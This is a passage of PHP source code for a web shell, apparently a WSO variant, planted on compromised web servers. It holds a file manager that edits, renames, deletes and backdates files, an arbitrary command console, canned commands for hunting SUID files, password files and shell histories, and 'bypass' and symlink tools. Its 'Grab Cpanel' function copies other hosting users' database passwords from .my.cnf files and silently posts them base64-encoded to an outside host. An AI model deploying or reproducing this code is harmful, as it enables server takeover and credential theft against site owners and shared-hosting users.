<span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n\techo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n\tif( empty($_POST[\'p2\']) )\r\n\t\t$_POST[\'p2\'] = \'view\';\r\n\tif( is_file($_POST[\'p1\']) )\r\n\t\t$m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\', \'Frame\');\r\n\telse\r\n\t\t$m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n\tforeach($m as $v)\r\n\t\techo \'<a href=# onclick="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n\techo \'<br><br>\';\r\n\tswitch($_POST[\'p2\']) {\r\n\t\tcase \'view\':\r\n\t\t\techo \'<pre class=ml1>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</pre>\';\r\n\t\t\tbreak;\r\n\t\tcase \'highlight\':\r\n\t\t\tif( @is_readable($_POST[\'p1\']) ) {\r\n\t\t\t\techo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\';\r\n\t\t\t\t$oRb = @highlight_file($_POST[\'p1\'],true);\r\n\t\t\t\techo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$oRb).\'</div>\';\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\tcase \'chmod\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$perms = 0;\r\n\t\t\t\tfor($i=strlen($_POST[\'p3\'])-1;$i>=0;--$i)\r\n\t\t\t\t\t$perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n\t\t\t\tif(!@chmod($_POST[\'p1\'], $perms))\r\n\t\t\t\t\techo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";</script>\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.chmod.value);return false;"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'edit\':\r\n\t\t\tif( !is_writable($_POST[\'p1\'])) {\r\n\t\t\t\techo \'File isn\\\'t writeable\';\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = @filemtime($_POST[\'p1\']);\r\n\t\t\t\t$_POST[\'p3\'] = substr($_POST[\'p3\'],1);\r\n\t\t\t\t$fp = @fopen($_POST[\'p1\'],"w");\r\n\t\t\t\tif($fp) {\r\n\t\t\t\t\t@fwrite($fp,$_POST[\'p3\']);\r\n\t\t\t\t\t@fclose($fp);\r\n\t\t\t\t\techo \'Saved!<br><script>p3_="";</script>\';\r\n\t\t\t\t\t@touch($_POST[\'p1\'],$time,$time);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,\\\'1\\\'+this.text.value);return false;"><textarea name=text class=bigarea>\';\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'r\');\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile( !@feof($fp) )\r\n\t\t\t\t\techo htmlspecialchars(@fread($fp, 1024));\r\n\t\t\t\t@fclose($fp);\r\n\t\t\t}\r\n\t\t\techo \'</textarea><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'hexdump\':\r\n\t\t\t$c = @file_get_contents($_POST[\'p1\']);\r\n\t\t\t$n = 0;\r\n\t\t\t$h = array(\'00000000<br>\',\'\',\'\');\r\n\t\t\t$len = strlen($c);\r\n\t\t\tfor ($i=0; $i<$len; ++$i) {\r\n\t\t\t\t$h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n\t\t\t\tswitch ( ord($c[$i]) ) {\r\n\t\t\t\t\tcase 0: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 9: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 10: $h[2] .= \' \'; break;\r\n\t\t\t\t\tcase 13: $h[2] .= \' \'; break;\r\n\t\t\t\t\tdefault: $h[2] .= $c[$i]; break;\r\n\t\t\t\t}\r\n\t\t\t\t$n++;\r\n\t\t\t\tif ($n == 32) {\r\n\t\t\t\t\t$n = 0;\r\n\t\t\t\t\tif ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';}\r\n\t\t\t\t\t$h[1] .= \'<br>\';\r\n\t\t\t\t\t$h[2] .= "\\n";\r\n\t\t\t\t}\r\n\t\t \t}\r\n\t\t\techo \'<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#000000><pre>\'.$h[1].\'</pre></td><td bgcolor=#202832><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n\t\t\tbreak;\r\n\t\tcase \'rename\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\tif(!@rename($_POST[\'p1\'], $_POST[\'p3\']))\r\n\t\t\t\t\techo \'Can\\\'t rename!<br>\';\r\n\t\t\t\telse\r\n\t\t\t\t\tdie(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n\t\t\t}\r\n\t\t\techo \'<form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.name.value);return false;"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\tcase \'touch\':\r\n\t\t\tif( !empty($_POST[\'p3\']) ) {\r\n\t\t\t\t$time = strtotime($_POST[\'p3\']);\r\n\t\t\t\tif($time) {\r\n\t\t\t\t\tif(!touch($_POST[\'p1\'],$time,$time))\r\n\t\t\t\t\t\techo \'Fail!\';\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\techo \'Touched!\';\r\n\t\t\t\t} else echo \'Bad time format!\';\r\n\t\t\t}\r\n\t\t\tclearstatcache();\r\n\t\t\techo \'<script>p3_="";</script><form onsubmit="g(null,null,\\\'\' . urlencode($_POST[\'p1\']) . \'\\\',null,this.touch.value);return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value="submit"></form>\';\r\n\t\t\tbreak;\r\n\t\t/* (С) 12.2015 mitryz */\r\n\t\tcase \'frame\':\r\n\t\t\t$frameSrc = substr(htmlspecialchars($GLOBALS[\'cwd\']), strlen(htmlspecialchars($_SERVER[\'DOCUMENT_ROOT\'])));\r\n\t\t\tif ($frameSrc[0] != \'/\')\r\n\t\t\t\t$frameSrc = \'/\' . $frameSrc;\r\n\t\t\tif ($frameSrc[strlen($frameSrc) - 1] != \'/\')\r\n\t\t\t\t$frameSrc = $frameSrc . \'/\';\r\n\t\t\t$frameSrc = $frameSrc . htmlspecialchars($_POST[\'p1\']);\r\n\t\t\techo \'<iframe width="100%" height="900px" scrolling="no" src=\'.$frameSrc.\' onload="onload=height=contentDocument.body.scrollHeight"></iframe>\';\r\n\t\t\tbreak;\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nif($os == \'win\')\r\n\t$aliases = array(\r\n\t\t"List Directory" => "dir",\r\n \t"Find index.php in current dir" => "dir /s /w /b index.php",\r\n \t"Find *config*.php in current dir" => "dir /s /w /b *config*.php",\r\n \t"Show active connections" => "netstat -an",\r\n \t"Show running services" => "net start",\r\n \t"User accounts" => "net user",\r\n \t"Show computers" => "net view",\r\n\t\t"ARP Table" => "arp -a",\r\n\t\t"IP Configuration" => "ipconfig /all"\r\n\t);\r\nelse\r\n\t$aliases = array(\r\n \t\t"List dir" => "ls -lha",\r\n\t\t"list file attributes on a Linux second extended file system" => "lsattr -va",\r\n \t\t"show opened ports" => "netstat -an | grep -i listen",\r\n "process status" => "ps aux",\r\n\t\t"Find" => "",\r\n \t\t"find all suid files" => "find / -type f -perm -04000 -ls",\r\n \t\t"find suid files in current dir" => "find . -type f -perm -04000 -ls",\r\n \t\t"find all sgid files" => "find / -type f -perm -02000 -ls",\r\n \t\t"find sgid files in current dir" => "find . -type f -perm -02000 -ls",\r\n \t\t"find config.inc.php files" => "find / -type f -name config.inc.php",\r\n \t\t"find config* files" => "find / -type f -name \\"config*\\"",\r\n \t\t"find config* files in current dir" => "find . -type f -name \\"config*\\"",\r\n \t\t"find all writable folders and files" => "find / -perm -2 -ls",\r\n \t\t"find all writable folders and files in current dir" => "find . -perm -2 -ls",\r\n \t\t"find all service.pwd files" => "find / -type f -name service.pwd",\r\n \t\t"find service.pwd files in current dir" => "find . -type f -name service.pwd",\r\n \t\t"find all .htpasswd files" => "find / -type f -name .htpasswd",\r\n \t\t"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\r\n \t\t"find all .bash_history files" => "find / -type f -name .bash_history",\r\n \t\t"find .bash_history files in current dir" => "find . -type f -name .bash_history",\r\n \t\t"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\r\n \t\t"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\r\n\t\t"Locate" => "",\r\n \t\t"locate httpd.conf files" => "locate httpd.conf",\r\n\t\t"locate vhosts.conf files" => "locate vhosts.conf",\r\n\t\t"locate proftpd.conf files" => "locate proftpd.conf",\r\n\t\t"locate psybnc.conf files" => "locate psybnc.conf",\r\n\t\t"locate my.conf files" => "locate my.conf",\r\n\t\t"locate admin.php files" =>"locate admin.php",\r\n\t\t"locate cfg.php files" => "locate cfg.php",\r\n\t\t"locate conf.php files" => "locate conf.php",\r\n\t\t"locate config.dat files" => "locate config.dat",\r\n\t\t"locate config.php files" => "locate config.php",\r\n\t\t"locate config.inc files" => "locate config.inc",\r\n\t\t"locate config.inc.php" => "locate config.inc.php",\r\n\t\t"locate config.default.php files" => "locate config.default.php",\r\n\t\t"locate config* files " => "locate config",\r\n\t\t"locate .conf files"=>"locate \'.conf\'",\r\n\t\t"locate .pwd files" => "locate \'.pwd\'",\r\n\t\t"locate .sql files" => "locate \'.sql\'",\r\n\t\t"locate .htpasswd files" => "locate \'.htpasswd\'",\r\n\t\t"locate .bash_history files" => "locate \'.bash_history\'",\r\n\t\t"locate .mysql_history files" => "locate \'.mysql_history\'",\r\n\t\t"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\r\n\t\t"locate backup files" => "locate backup",\r\n\t\t"locate dump files" => "locate dump",\r\n\t\t"locate priv files" => "locate priv"\r\n\t);\r\nfunction actionConsole() {\r\n if(!empty($_POST[\'p1\']) && !empty($_POST[\'p2\'])) {\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', true);\r\n $_POST[\'p1\'] .= \' 2>&1\';\r\n } elseif(!empty($_POST[\'p1\']))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\', 0);\r\n\tif(isset($_POST[\'ajax\'])) {\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n\t\tob_start();\r\n\t\techo "d.cf.cmd.value=\'\';\\n";\r\n\t\t$temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\'\\0"));\r\n\t\tif(preg_match("!.*cd\\s+([^;]+)$!",$_POST[\'p1\'],$match))\t{\r\n\t\t\tif(@chdir($match[1])) {\r\n\t\t\t\t$GLOBALS[\'cwd\'] = @getcwd();\r\n\t\t\t\techo "c_=\'".$GLOBALS[\'cwd\']."\';";\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "d.cf.output.value+=\'".$temp."\';";\r\n\t\techo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";\r\n\t\t$temp = ob_get_clean();\r\n\t\techo strlen($temp), "\\n", $temp;\r\n\t\texit;\r\n\t}\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n\t\tprototype(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n\thardHeader();\r\n echo "<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\nvar cmds = new Array(\'\');\r\nvar cur = 0;\r\nfunction kp(e) {\r\n\tvar n = (window.Event) ? e.which : e.keyCode;\r\n\tif(n == 38) {\r\n\t\tcur--;\r\n\t\tif(cur>=0)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur++;\r\n\t} else if(n == 40) {\r\n\t\tcur++;\r\n\t\tif(cur < cmds.length)\r\n\t\t\tdocument.cf.cmd.value = cmds[cur];\r\n\t\telse\r\n\t\t\tcur--;\r\n\t}\r\n}\r\nfunction add(cmd) {\r\n\tcmds.pop();\r\n\tcmds.push(cmd);\r\n\tcmds.push(\'\');\r\n\tcur = cmds.length-1;\r\n}\r\n</script>";\r\n\techo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\\\'clear\\\'){d.cf.output.value=\\\'\\\';d.cf.cmd.value=\\\'\\\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\\\'\\\');} return false;"><label><select name=alias>\';\r\n\tforeach($GLOBALS[\'aliases\'] as $n => $v) {\r\n\t\tif($v == \'\') {\r\n\t\t\techo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\techo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n\t}\r\n\techo \'</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\\\'\\\');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 \'.(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX <input type=checkbox name=show_errors value=1 \'.(!empty($_POST[\'p2\'])||$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'stderr_to_out\']?\'checked\':\'\').\'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>\';\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\techo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n\t}\r\n\techo \'</textarea><table style="border:1px solid #000000;background-color:#000000;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>\';\r\n\techo \'</form></div><script>d.cf.cmd.focus();</script>\';\r\n\thardFooter();\r\n}\r\nfunction actionbypas() {\r\n\thardHeader();\r\n\techo "<center><h1>Bypass Tools</h1><div class=content><br>";\r\n\t\r\n\techo"<th><a href=\'#\' onclick=\'g(\\"passw\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'> [ Bypass: /etc/passwd ] </a></th><p>";\r\n\techo"<th><a href=\'#\' onclick=\'g(\\"disable\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'> [ Bypass: Disbaled Functions ] </a></th>";\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionSym() {\r\n\thardHeader();\r\n\techo "<center><h1>Symlink</h1><div class=content><br>";\r\n\t\r\n\techo "<br><center> <iframe src=\'?sym\' width=\'900\' height=\'300\'></iframe></a>";\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionpassw() {\r\n\thardHeader();\r\n\techo "<center><h1>Bypass: /etc/passwd</h1><div class=content><br>";\r\n\t\r\n\techo "<br><center> <iframe src=\'?passwd\' width=\'900\' height=\'400\'></iframe></a>";\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actiondisable() {\r\n\thardHeader();\r\n\techo "<center><h1>Bypass: Disabled Functions</h1><div class=content><br>";\r\n\techo "<br><center> <iframe src=\'?disabled\' width=\'900\' height=\'300\'></iframe></a>";\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionPhp() {\r\n\thardHeader();\r\n\techo "<center><h1>Grab Cpanel</h1><div class=content><br>";\r\n\t @ini_set(\'display_errors\', 0);\r\nfunction entre2v2($text, $marqueurDebutLien, $marqueurFinLien, $i = 1) {\r\n $ar0 = explode($marqueurDebutLien, $text);\r\n $ar1 = explode($marqueurFinLien, $ar0[$i]);\r\n return trim($ar1[0]);\r\n}\r\necho \'<br><br>\';\r\necho \'<center>\';\r\n$d0mains = @file(\'/etc/named.conf\');\r\n$domains = scandir("/var/named");\r\nif ($domains or $d0mains) {\r\n $domains = scandir("/var/named");\r\n if ($domains) {\r\n echo "<table align=center><tr><th valign=top class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>";\r\n $count = 1;\r\n $dc = 0;\r\n $list = scandir("/var/named");\r\n foreach ($list as $domain) {\r\n if (strpos($domain, ".db")) {\r\n $domain = str_replace(\'.db\', \'\', $domain);\r\n $owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));\r\n $dirz = \'/home/\' . $owner[\'name\'] . \'/.my.cnf\';\r\n $path = getcwd();\r\n if (is_readable($dirz)) {\r\n copy($dirz, \'\' . $path . \'/\' . $owner[\'name\'] . \'.txt\');\r\n $p = file_get_contents(\'\' . $path . \'/\' . $owner[\'name\'] . \'.txt\');\r\n $password = entre2v2($p, \'password="\', \'"\');\r\n echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>" . $count++ . "</td><td valign=top style= width: 139px; border :2px solid white class=style2 ><a href=http://" . $domain . ":2082 target=_blank>" . $domain . "</a></td><td valign=top style= width: 139px; border: 2px solid white class=style2 >" . $owner[\'name\'] . "</td><td valign=top style= width: 139px; border: 2px solid white class=style2 >" . $password . "</td><td valign=top style=border :2px solid white style=width: 139px><a href=" . $owner[\'name\'] . ".txt target=_blank>Click Here</a></td></tr>";\r\n $dc++;\r\n $success3 = "http://" . $domain . "|" . $owner[\'name\'] . "|" . $password . "\r\n";\r\n $ch = curl_init();\r\n curl_setopt($ch, CURLOPT_URL, "http://ww3s.ws/ok.php");\r\n curl_setopt($ch, CURLOPT_USERAGENT, \'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0\');\r\n curl_setopt($ch, CURLOPT_POST, 1);\r\n curl_setopt($ch, CURLOPT_POSTFIELDS, "result=" . base64_encode($success3));\r\n curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n curl_setopt($ch, CURLOPT_HEADER, 1);\r\n $buffer = curl_exec($ch);\r\n }\r\n }\r\n }\r\n echo \'</table>\';\r\n $total = $dc;\r\n echo \'</center>\';\r\n } else {\r\n $d0mains = @file(\'/etc/named.conf\');\r\n if ($d0mains) {\r\n echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";\r\n $count = 1;\r\n $dc = 0;\r\n $mck = array();\r\n foreach ($d0mains as $d0main) {\r\n if (@eregi(\'zone\', $d0main)) {\r\n preg_match_all(\'#zone "(.*)"#\', $d0main, $domain);\r\n flush();\r\n if (strlen(trim($domain[1][0])) > 2) {\r\n $mck[] = $domain[1][0];\r\n }\r\n }\r\n }\r\n $mck = array_unique($mck);\r\n $usr = array();\r\n $dmn = array();\r\n foreach ($mck as $o) {\r\n $infos = @posix_getpwuid(fileowner("/etc/valiases/" . $o));\r\n $usr[] = $infos[\'name\'];\r\n $dmn[] = $o;\r\n }\r\n array_multisort($usr, $dmn);\r\n $dt = file(\'/etc/passwd\');\r\n $passwd = array();\r\n foreach ($dt as $d) {\r\n $r = explode(\':\', $d);\r\n if (strpos($r[5], \'home\')) {\r\n $passwd[$r[0]] = $r[5];\r\n }\r\n }\r\n $l = 0;\r\n $j = 1;\r\n foreach ($usr as $r) {\r\n $dirz = \'/home/\' . $r . \'/.my.cnf\';\r\n $path = getcwd();\r\n if (is_readable($dirz)) {\r\n copy($dirz, \'\' . $path . \'/\' . $r . \'.txt\');\r\n $p = file_get_contents(\'\' . $path . \'/\' . $r . \'.txt\');\r\n $password = entre2v2($p, \'password="\', \'"\');\r\n echo "<tr><td valign=top class=style2 style=width: 139px>" . $count++ . "</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://" . $dmn[$j - 1] . \'/>\' . $dmn[$j - 1] . \' </a></td><td valign=top class=style2 style=width: 139px>\' . $r . "</td><td valign=top class=style2 style=width: 139px>" . $password . "</td><td valign=top class=style2 style=width: 139px><a href=\'" . $r . ".txt\' target=\'_blank\'>Click Here</a></td></tr>";\r\n $dc++;\r\n flush();\r\n $l = $l ? 0 : 1;\r\n $j++;\r\n }\r\n }\r\n }\r\n echo \'</table>\';\r\n $total = $dc;\r\n echo \'<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = \' . $total . \'</h3><br />\';\r\n echo \'</center>\';\r\n }\r\n} else {\r\n echo "<div class=result><i><font color=#ff1111>ERROR</font><br><font color=#ff1111>/var/named</font> or <font color=#ff1111>etc/named.conf</font> Not Accessible!</i></div>";\r\n}\r\n\techo" </div>";\r\n\thardFooter();\r\n}\r\nfunction actionReseller() {\r\n\thardHeader();\r\n\techo "<center><h1>WHM & Reseller Finder</h1><div class=content><br>";\r\n\techo "<br><center> <iframe src=\'?reseller\' width=\'900\' height=\'470\'></iframe></a>";\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionFilesMan() {\r\n if (!empty ($_COOKIE[\'f\']))\r\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tswitch($_POST[\'p1\']) {\r\n\t\t\tcase \'uploadFile\':\r\n\t\t\t\tif ( is_array($_FILES[\'f\'][\'tmp_name\']) ) {\r\n\t\t\t\t\tforeach ( $_FILES[\'f\'][\'tmp_name\'] as $i => $tmpName ) {\r\n if(!@move_uploaded_file($tmpName, $_FILES[\'f\'][\'name\'][$i])) {\r\n echo "Can\'t upload file!";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'mkdir\':\r\n\t\t\t\tif(!@mkdir($_POST[\'p2\']))\r\n\t\t\t\t\techo "Can\'t create new dir";\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'delete\':\r\n\t\t\t\tfunction deleteDir($path) {\r\n\t\t\t\t\t$path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n\t\t\t\t\t$dh = opendir($path);\r\n\t\t\t\t\twhile ( ($▟ = readdir($dh) ) !== false) {\r\n\t\t\t\t\t\t$▟ = $path.$▟;\r\n\t\t\t\t\t\tif ( (basename($▟) == "..") || (basename($▟) == ".") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t$type = filetype($▟);\r\n\t\t\t\t\t\tif ($type == "dir")\r\n\t\t\t\t\t\t\tdeleteDir($▟);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($▟);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir($dh);\r\n\t\t\t\t\t@rmdir($path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@$_POST[\'f\']))\r\n\t\t\t\t\tforeach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n\t\t\t\t\t\t$f = urldecode($f);\r\n\t\t\t\t\t\tif(is_dir($f))\r\n\t\t\t\t\t\t\tdeleteDir($f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink($f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase \'paste\':\r\n\t\t\t\tif($_COOKIE[\'act\'] == \'copy\') {\r\n\t\t\t\t\tfunction copy_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\tcopy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'move\') {\r\n\t\t\t\t\tfunction move_paste($c,$s,$d){\r\n\t\t\t\t\t\tif(is_dir($c.$s)){\r\n\t\t\t\t\t\t\tmkdir($d.$s);\r\n\t\t\t\t\t\t\t$h = @opendir($c.$s);\r\n\t\t\t\t\t\t\twhile (($f = @readdir($h)) !== false)\r\n\t\t\t\t\t\t\t\tif (($f != ".") and ($f != ".."))\r\n\t\t\t\t\t\t\t\t\tcopy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n\t\t\t\t\t\t} elseif(@is_file($c.$s))\r\n\t\t\t\t\t\t\t@copy($c.$s, $d.$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach($_COOKIE[\'f\'] as $f)\r\n\t\t\t\t\t\t@rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'zip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_COOKIE[\'c\']);\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_COOKIE[\'c\'].$f))\r\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\r\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'unzip\') {\r\n\t\t\t\t\tif(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($zip->open($_COOKIE[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif($_COOKIE[\'act\'] == \'tar\') {\r\n chdir($_COOKIE[\'c\']);\r\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\r\n ex(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n\t\t\t\t}\r\n\t\t\t\tunset($_COOKIE[\'f\']);\r\n setcookie(\'f\', \'\', time() - 3600);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty($_POST[\'p1\'])) {\r\n\t\t\t\t\tprototype(\'act\', $_POST[\'p1\']);\r\n\t\t\t\t\tprototype(\'f\', serialize(@$_POST[\'f\']));\r\n\t\t\t\t\tprototype(\'c\', @$_POST[\'c\']);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n hardHeader();\r\n\techo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>\';\r\n\t$dirContent = hardScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n\tif($dirContent === false) {\techo \'Can\\\'t open this folder!\';hardFooter(); return; }\r\n\tglobal $sort;\r\n\t$sort = array(\'name\', 1);\r\n\tif(!empty($_POST[\'p1\'])) {\r\n\t\tif(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n\t\t\t$sort = array($match[1], (int)$match[2]);\r\n\t}\r\necho "<script>\r\n\tfunction sa() 